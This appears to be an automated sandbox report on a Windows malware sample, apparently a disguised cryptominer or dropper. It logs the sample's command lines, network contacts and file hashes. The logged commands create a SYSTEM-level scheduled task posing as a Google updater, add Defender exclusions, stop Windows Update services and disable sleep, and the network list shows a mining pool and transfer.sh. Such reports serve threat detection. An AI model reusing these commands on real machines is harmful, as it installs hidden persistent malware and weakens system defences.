powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {349F8664-B064-434E-87A7-BA89F112274C} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=37935 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef6939758,0x7fef6939768,0x7fef6939778

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=796 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1228 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=37935 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1352 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37935 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1984 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37935 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2500 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37935 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2620 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:1

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 136.244.98.226:33587 tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp

Files

memory/2636-56-0x00000000003A0000-0x00000000003DF000-memory.dmp

memory/2636-55-0x0000000000230000-0x0000000000330000-memory.dmp

memory/2636-57-0x0000000000400000-0x00000000022FF000-memory.dmp

memory/2636-59-0x0000000006710000-0x0000000006750000-memory.dmp

memory/2636-58-0x0000000003FE0000-0x0000000004018000-memory.dmp

memory/2636-60-0x0000000006710000-0x0000000006750000-memory.dmp

memory/2636-62-0x0000000006710000-0x0000000006750000-memory.dmp

memory/2636-61-0x0000000074D90000-0x000000007547E000-memory.dmp

memory/2636-63-0x0000000004180000-0x00000000041B4000-memory.dmp

memory/2636-64-0x00000000041F0000-0x00000000041F6000-memory.dmp

memory/2636-65-0x0000000006710000-0x0000000006750000-memory.dmp

memory/2636-66-0x0000000000230000-0x0000000000330000-memory.dmp

memory/2636-67-0x00000000003A0000-0x00000000003DF000-memory.dmp

memory/2636-68-0x0000000000400000-0x00000000022FF000-memory.dmp

memory/2636-70-0x0000000006710000-0x0000000006750000-memory.dmp

memory/2636-71-0x0000000074D90000-0x000000007547E000-memory.dmp

memory/2636-72-0x0000000006710000-0x0000000006750000-memory.dmp

memory/2636-73-0x0000000006710000-0x0000000006750000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabC2E4.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\TarC518.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1dffc4ec990d1d262881a4600fb35797
SHA1 4b1a7ae3d950e31e0f3d8cb90bbcba39b331ba27
SHA256 3805a8d0eadc1983604c3dd09f8f5f6f27bb5f26c778f8f70a490925116a3ed5
SHA512 b5fe94c4cc40ccc150dc49a05ac143120d68ef6213be34ca831aa85cd5b21f702866f4f07abf9a58236a7db3bfec09bc69406686de1a915929f8cc906fd9c0b0

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2888-163-0x0000000003810000-0x0000000004A36000-memory.dmp

memory/2904-166-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/2904-167-0x0000000077C90000-0x0000000077E39000-memory.dmp

memory/2904-168-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/2904-169-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/2904-170-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/2904-171-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/2904-172-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/2904-173-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/2904-175-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/2888-176-0x0000000003810000-0x0000000004A36000-memory.dmp

memory/2904-177-0x0000000077C90000-0x0000000077E39000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2180-185-0x0000000000820000-0x0000000000AAB000-memory.dmp

memory/2636-184-0x000000000A220000-0x000000000A4AB000-memory.dmp

memory/2180-186-0x0000000000820000-0x0000000000AAB000-memory.dmp

memory/1916-187-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1916-188-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1916-194-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1916-196-0x0000000000400000-0x0000000000527000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1916-199-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1596-209-0x00000000023A0000-0x00000000023A8000-memory.dmp

memory/1916-208-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-207-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1596-206-0x000000001B170000-0x000000001B452000-memory.dmp

memory/1916-205-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-210-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-212-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-217-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-216-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-215-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-214-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-213-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2904-211-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/1916-218-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-219-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-220-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-221-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-223-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-225-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-224-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-222-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-226-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-227-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-228-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-229-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-230-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-234-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-233-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-231-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1916-235-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-236-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-237-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-238-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-239-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-240-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-242-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-241-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1596-244-0x000000000240B000-0x0000000002472000-memory.dmp

memory/1916-243-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-245-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-246-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1596-264-0x0000000002404000-0x0000000002407000-memory.dmp

memory/1596-263-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/1916-284-0x0000000077E8F000-0x0000000077E90000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 be888b9c10c69b9b8cea30806dc11dda
SHA1 35d16d70fde8315b40cc06d563bd6496024852cc
SHA256 a3e79440e164e60eda9109f7750d117e38a93b048800f27647d45142e5aa2abc
SHA512 4661610f9792ce3949cfe52d270f8565dfb6f70f1f2604c8efd9f6aa536688527486c337331bfebb6d3dac0b25e369ab1a8c87e9d8d28b61ef0b014f6d580e33

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FZ8FUABT5TFTRYLILC2F.temp

MD5 be888b9c10c69b9b8cea30806dc11dda
SHA1 35d16d70fde8315b40cc06d563bd6496024852cc
SHA256 a3e79440e164e60eda9109f7750d117e38a93b048800f27647d45142e5aa2abc
SHA512 4661610f9792ce3949cfe52d270f8565dfb6f70f1f2604c8efd9f6aa536688527486c337331bfebb6d3dac0b25e369ab1a8c87e9d8d28b61ef0b014f6d580e33

memory/2760-297-0x0000000002000000-0x0000000002008000-memory.dmp

memory/2760-296-0x000000001B060000-0x000000001B342000-memory.dmp

memory/2760-299-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/2760-298-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

memory/2760-302-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/2760-301-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/2760-300-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

memory/2760-303-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2904-307-0x0000000077C90000-0x0000000077E39000-memory.dmp

memory/2904-308-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/2636-309-0x000000000A220000-0x000000000A4AB000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2180-313-0x0000000000820000-0x0000000000AAB000-memory.dmp

memory/2984-315-0x000000013F300000-0x0000000140526000-memory.dmp

memory/2608-321-0x000000013F300000-0x0000000140526000-memory.dmp

memory/2608-323-0x0000000077C90000-0x0000000077E39000-memory.dmp

memory/1596-324-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/2608-328-0x000000013F300000-0x0000000140526000-memory.dmp

memory/2984-327-0x000000013F300000-0x0000000140526000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2636-334-0x000000000A710000-0x000000000AD44000-memory.dmp

memory/2608-336-0x0000000077C90000-0x0000000077E39000-memory.dmp

memory/2600-337-0x0000000000A20000-0x0000000001054000-memory.dmp

memory/2600-338-0x0000000077E80000-0x0000000077E82000-memory.dmp

memory/2600-341-0x0000000000540000-0x00000000005B0000-memory.dmp

memory/2600-342-0x0000000074D90000-0x000000007547E000-memory.dmp

memory/2600-343-0x0000000002AD0000-0x0000000002B3C000-memory.dmp

memory/2600-345-0x0000000005350000-0x0000000005390000-memory.dmp

memory/2600-344-0x0000000005350000-0x0000000005390000-memory.dmp

memory/2600-346-0x0000000005350000-0x0000000005390000-memory.dmp

memory/2600-347-0x0000000005A20000-0x0000000005AD2000-memory.dmp

memory/2636-370-0x000000000A710000-0x000000000AD44000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1044-384-0x00000000199E0000-0x0000000019CC2000-memory.dmp

memory/1044-385-0x00000000009C0000-0x00000000009C8000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Local State

MD5 599ca5736af45693fb51e9c651732be7
SHA1 c5f5ca164674e1efeb338c4e0c871a8929e95daa
SHA256 d29a09b1c799fb997acd0fd8ed25e299bf098cb88359157a3e0a3ea6639d74f1
SHA512 297f14878c07c1571ebc55a4c4a350149541b4af68c910a10d8c74e6b44de7290dd84664b0bec08876321fed703e29a11aaf2b615a7e08a434bd52ed5f1bf2fa

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Local Storage\leveldb\LOG

MD5 ec57f79b5fcea2ce4a3b031888983ff6
SHA1 75898d7cf9bde6655e81d188dc627f223ba0799d
SHA256 569e212b0f9164c16c010cca98a95de990a945dfdda9aceebcd2cb44a8d930b7
